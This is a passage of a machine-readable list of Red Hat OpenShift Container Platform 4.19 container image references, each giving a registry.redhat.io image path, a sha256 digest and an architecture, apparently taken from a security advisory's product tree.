"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5ff1fab804d261aa3ef884e9288eadaea59bf40a26face259decb7e3a686a85f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:15fa093433263f5b73be4d59d0bbadaa6f0201f0d8bb0e72ed4187db8ebd4ecd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:58059ecb3d457599d000a7a113b943e53bfdaed0225b6df8cda9ff83f1c30b21_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:5f723bb5d81abb468b45850e894aa3f719cbac259b5a425b1abf3fffba3d7866_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:fb63e1f96831506bc79fbdd4f78ee9da3913f86f128f538db70a8badc23ac854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:07a5ff47f0ddbc7ac2293a6f6af6ed2a9cb4027e7ad61042863187df69babda3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:1fbb335fd71191a6096d16c4769716255b833d9fbbfa60d4f12dc014e5d24da2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:b8a54951f2fb26aa2b0cc93634a7147e4f2fa68a6986c527c5fda7ced2007e90_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:be5b247472e8155811e40b74a539d15d649c6175e469184aae7cc7a3ae435563_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:0f01b3199d4bbd7d691bd416ce41adb2123807534c965355e03ae0469425eb89_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:387d9d633840c30c52695f776e48e80031e110b05c9ef082597a5cdbf9f5eea2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:68f71f58e04099967346c0fae031fde60887bbb7dd1041c4d83a0b98455dabd1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:df471031bae8d15bb58bc650ab6d4b9f4fa3f0483cb65838ad147594ec9f33af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:07dfb0c56f132cd5acf76e5879f521be9abdcf5dc4e2fc663e89739f5e0d5538_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:8f02237f34890ade5878008f0c923597951019454ac5353a63c6616dd33f8f2d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:9979f3eec067571040422a0ad1b96b993a415bf2743960292df2a95b279ca695_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:b46b98d3ad75e63e9be7b603a77e27075653ec3afb7e8689fdd182cf40abd3f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:3582bf5119513e9d51d83e2d1b3f70a955d2a0675e0b120ba7f6394e94b94e03_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:6b0e909a37e06abaa39c795be926d2da861b9f00fd4c0be18fe7890d825cb6ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:ab94610c1dd35f92ad186846735758cf5a301d9bc4e883b2692011988edb4fd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:cf8b7ce2d36bccb2bcbee8bfd0de6bdae5dc40b0199059b2759d0aba56151baa_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:510a2039d88a9f1ae59848d4f6589b7585f002c68f0da8f8a970685d7fb40a5e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6db47ba74f791eb39da7af1862d8978da61cbfd88219441950861ef469cbe472_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6ec129d640af33af43d698593ae543d22394d0b7bb19b2fd89dfd257e5629ba3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f09043d293b8948f83da5b5722a0edb74ae3f54b58eeea19c490c0112bad2071_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:802e9ee888afb88e576fee42f11c7ee0d6fcbfb7b5213df16cac12c2b75a1d7c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:8cc4458a66fce822d175559277398c7aef9ddb383399efaf80650c2f350505fd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:bfbaa99fb697f2a352b97de52a35729481556ac4ad3efadf6b796356a2830fd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:c1de6ec5108a02b21c15f44308fc3a9b4293f94353c0f25f11576a74fb21ce5d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:622a5b555fb855d565a2c66137c248a239a364c00671d271782695d144d8a56d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:640febb01fbe420ea03dcf3cc19bb8d0c9cf26c4af953133d51347baef830441_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:ce22905d9a22de00509343c81f9400e436132912a9ae6ddf675c0928f3ea4d27_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d07ec10275070567596dfccce0a09bd2fbed9d5d452a813f26b1aa3d313b9d71_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:7ecb1d8a291da4a5113355fb9cd53efbe82879d419678800984d8d2b0b1e2b60_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:aa490b00e5c8c799fed61101cdcb32447eab6caf4c4c1037f1a7f9b5ee5c2500_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ac962f2ec19c1cf0922a5af1d60c6535da0d2bb2e3b1f2bf60f559e7c91fa659_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:211d64fbaf9ecb4d767c4fddea4eadf048ff3783ab8aa28bde76844eaa735361_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:c373f479b51f2bd757cac4f24479cb9056d7745d588cd3a563c364dd63a55d88_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fadf5aa90de3fda8b5253c6338406a0eb64866e3f3aab1bfc5f5c0713f3c4277_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:b8604b708e45c6b23f0f82a5dca52077d30819e646da9d45cf7f93bcbf58f3ce_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e089a7b006efdb5583e05d087a02e0e0416577e913e3d5c6f4cff6918d564436_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:eb327d173c6e77b0c6a60c3774ba0246ce5e2df01639e7bbb59952e9b92e65f6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:7cf202edc41319fe4b36e57b8663292e9cd6a04c632237a5184a0b441dfcf761_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b3cb2b6d300c2b2d579c7f8c7f66b52fbc891717e29d7b85c204b518093f529f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b9332849e3b7652afc5dcad447cabeeb884066723a3b174c43fdd39d5651c67e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:50f27ddd76331df3b0b34c55391976f546f664f0d7a34130fc57c0d8ba9ee75f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:5ff71a6725a51510527d6497b921474a5e735dd4cb53b984ed8af54595b1cd1a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:70b4576443acce236a5bc1244d7bb7ccd11c22b307e8d302fd0038dfc61efa73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:c948760bcc0d498230283dc4126370ac9e98eb1d0bdceccdc0a5f20f8b851b9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:596d00eb17bd6f00e2b26605db7a54bf04425c6a8a188f5a373643530a4c79ca_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:c3fddc9f6c1e96c29dc018fb30d9f70814390cc4b111089264d4cc82378da5ad_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:dae117e1d6954cb63417510332fc70b5bafb19e0cc618fc103ef4b6581ecbfdb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:fb23578b8ce937223392967c69b130551572dfab261815242d42ab090f999853_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:720cd3b89d18772d0230731f18dadae46bdb48b4b83d4c3c2afee787eb966f49_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b207edd030f98804d2dd7a7055b5bb5bfa5008c3c6753ecaffb7fbc0bf18d56a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:e3a086f93b62590794af9f69fc273b3125fd88184e8467b3531d02521282ca06_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:fb2ea87732bd32c58d57656d38d3393bc7c48bb6edc41bc23464dc25ec2c72b7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:1a62f6e266959b7ac07e5b79dfec40cd78be425a6b394b8201857632067db88d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:42e9b35962e1716efd05d11f66862be9711397b87be5c16de41ca67e4fb123db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:9549947e4c8b0005815e651ebc1cbde8adeed54d89ace772f7c87210624cf587_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e6ef275bd908e468f74c371734c00cc8e34fda230407b11caca2ca0e4a8cb98a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:a02dab2c1d82d33beb22f0d834e89ee5d9d000717c5c9773a86315446222e3d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b692a262776393fe214b1f5e16690098f0ba9c52da91ef168d67915bd4d915b6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:0eec1806c1aebb18c929da840845a8acff65ddc2066d343f2d02b3dd080954e1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:d82c48027fa2cc1aa104eaca2dfc6c556316cbf6a1bd6b0cacfb5ce8f010c028_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:36145ed08ac5a3071011ff44e0411e3ded8d3483cf59d296c4795043f13f8e10_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:6b27224dacb73ea14d2d561add8d93b960a69b602233731b29b134ad732de8d6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5dd61548a039d382bb8e0af3e31dfff8d6ec4c5edfccff587c94ece6e8b53281_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:e0ca3155faa73128c74048ce8082773be395f0072b87d01b9f4cd973f48d5486_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:fd6b29e7ed8f0d58789237c6cb855980611e3d03bcd0628ba4ba8e6beff4c155_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:8d950f862e7b1c75962ed4357e08b0b071f606dc9fa797e10708cbd69dccc705_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:bf3fa8833ab188a275570bc9f3e58dc4f174015221c3d7aa388468b38b2aec5c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:173bbd5617f3d72c0b111b073dfba182a6e13562cc205ac707610e4bc99c1b24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4efe2d4316675a37da7f0536a891bcf2e4aeadf52bdc4678e6946f8884d3b4fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:0745552aff8b52b7c604cb52765a1aa4ac038b856cf0ceaa61db217515dc9337_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:b88a20e45675d4a9a238d64cb0b6dacc162b4ec207251e5ae7c68303644ac306_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c5227faf255e647c6444c423132e4de3562ac3279a17a2665be03d4e6bba9750_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:ed35e169497b1564059e5bffeba1da87648ce27b7f6a09474d25a19bd22cf9bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:084a30f22516957c012928dcca3c9729cdb9e6199039e758c9d468cd22c1244a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:60bf3d574a9289b95a0d999a8e653df107ee3fa888bf367436aee7417ceaf3c4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:9dd7dfbd3499b485fd5765aba6384127c2777796ec50b182fc7ef63303835bc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:a3169dfd6918dd2108992611cdd3f14525e9f5e5d05cbd174007373ca3442c5c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:10bda9f9f7f635c444b59e1d0db17776fe52ce9a3e39aba1d0ad339cde9dfcd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:21db43c73f7fe5af15ce187586dee84e949ea0a8a3f10fb2da428b3806b3c686_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:723e5bc45bbcfcd5d3ae97339bba491d383876c094f17f8300be5ed6fdc9591f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f54ba33d1bcd4d7053ee4baf0d16a2b5af52f0e5a123f6c3bd0976ddacd027a4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:3e31d1ece33dffbe5b4d54b888a2d16fe2137f6f35c99a7e5122ff8e0125250d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:dd33a77af11d0f36915205c343eff9bfa86a9a774d82796e6e1f0d8bf454defd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:47995224ef8ebb0c96f589b4e65d0303ec25cdf337f1593443e5558f58820748_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e33a0af2825ccfcd6d29470feabfd1710adda01a7a189957f04cc76d02e504db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:46ce51221a7b62f026ea8958b2e70a4956e48dfffe46196941a232a0a0374e9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f5f3cef14751cc722c6d793f20f2f29e51dcb50eb0a27f182e1cb5cef0a169db_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:02b842b08e52152114669293b4e74a0be77c6b142157787d0a394830ea71f376_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:f2487a02cdd1eef6fb3b9462a39768a8f51110bf9321bc7229898a0c7d7dec4a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:2f381d5e585969b0ec3585d0b3ad338dd8067af067835993832abd50b9094957_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:bf2079d194c311cb1d41b1004f20753190145015c5dd9cdf124c46f62b9e4a15_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:dda8095185ee7997bb9a804fe5a2ebf519e5a5cf53a70439ff2771d21bc24f41_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:f51f73917d40e7fc6eab7e9700eb2c253f16c62173d103eb6b38daba651e17cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:4b6046eefed5840fa2ded2d2164a088ed3cfd22b50c2c05ebafd92a3190e1854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:b71de8c64a624d154400844e3f95992e3c5c4090adeecb5158404a6b4cac6be5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:c471af7de03ccb0fd093a774ee727a3d7712fc073773ad6e0180004d3d1f8fba_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:dbfe8e54acdfbfc04d1014cae94d227bd45e92d127139a615312e1012485dfa7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:3509c3e8eaea4bd214c01ad94d9f9f7ce342103e2cecbc1badacfe4b968946e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:b06062b58d2db8dae5dfdf6cb413858d5c79f7935d59c1d2397c81d40e377d88_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:dae79f64ec77c8deccdad3c4b451940387d8a081e5cdec911c43c5d475b32256_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:fdae399bd29a16232ccaf26fb70b74685c899c0a2ee12910b71a8ae3fcf268ef_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:6267c3fdcdc21c0af4b42a9aa609f164956f0e996162bc87d7466453aa2aad35_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:85a45cc6d79a04a9175d26598325f0a4a1dd3fc279c99aeabe1a6293acc97506_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:aff5468f2fbe57381b15f3e7ca5bcc6b970d554ba239704ec256252b4eddf141_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:c0479910cf5b778058431462c989f6a84d45b12b90f7b8d5e6d041b685e15805_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:0360e8bd3841088dbaca2ec4d960f77f11c70d54d6e5d3b7ce003307b5d04ff8_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:358e506102e7de0a527fd5cb78018395b6fa93683b556e4b3549879e3849291d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:6931003b4a38864328a012655388fcf8475e79ef4f5d97cda18924571df436a6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b77f9bbb2cff61a07a2a3ef19b3b06245a1aef3537c1bae47a349906983865ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:17794053b3ede5275c7115f7d33a3402dcfb0328ffe1a5df86b296ed9e7e0e9d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:3062abd2eeed1e94d36b2ef11f78c951e56d14792f06c73b0de554522591f506_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:6dbd254f4edee48593ff7e3e58a201cd02ee9cf9cb3cfb007c409b7bfa34137a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:805c6881556aebde1af449f5fd8c2fd61e02a8e661890a13c17860c618953abe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:7a4ce4e7146c846b4450f0f027dd07d3f5e32d40b3bc7e167032eef302c618f5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:aa4406e97de26cacc019d382930ff3f749893d8a79d7e5d03ce5f37ce265e7fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:b9e9fa1e81c89ac933903ab395e215ddb0b0850973d3789d7e969512789906ca_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:ddb230986001dba038e11d3f59a650b25721a7e3e2ee15319e5aef8d3e46782a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:60c3470aba8dac67522d1ddb34e57289dce5a2974d65e0cb34a13931e6d5976b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:6bc5ed044cf1d286364f620c26a428842b3b17010574a5b937bb7095181aa8d4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:0cfb374c9ae690b499b72fa43e985c6593bb8a461464f57b014f22f1774059b0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:4afa5a31ec371dc1cff20d2d3547d15e39b7eda901b96d4b95024b9b5e1e8d13_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:59413cffc1a85c76b6e161666f8c06dc6525092466130520d0002547ba824df3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:863b30b65dfedac6d384bf7c0b69670777452f6e19a4ef3a0fe9902cd4b08bf2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:eb58e580aac2f881aef5e6de30c588ea8efbc35edd33736a8830a1442e1878e7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:486e3158229579453dafa3438862a2000603dc40d8e92edb8fe59734244ad786_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:5cfb798541e25e1bb1592f157222a40b31b680a85336bab0c88af98606313a46_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:81bf0b5564a44be0cee22fce23cf7237fc2db06ad8c67bc81673d9bdc8f82a18_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eca21187e941910b53c4a325413f455e73aa2954f9e286232326ba8c71c0154a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:042bf2a1e502809836efca400fc7d7b9e781697611b59cbfd34874a909019518_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:1e7d336b0b1ab6e865635976d2b704debfd8b2ee3370d869d614c7c99b7e2113_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:448aa273da6d50833fa4485fa39bd2ae0248ade7d7e6ace95dbccac96e62ffe3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:7bf94fbd24315a72727f2957d2b106fdbfe6c2d6129f38c3ef4d8d174a298f51_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:4b36552929bc8cfe57e8d24d48aea83515351b5b1339a3c43ff8ced0a1bf1d4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:542fd2652f1cd2f47478979e1ba39295889a54cc28e6f6a642554ad4c5cc93cb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:f7ed54888aa22a6c19700077522c97adf372f38cf4350a009e644590182fb3cb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:faf9e3ec97eb13e2bd96d2c5ffb80ffd09486f67fd1c0d14a605438a8d24b95e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:20b9ee6a4f6c462c2b53a6d449ed18c20a9f3917f94f08548a451e83e6f4a1c9_amd64",
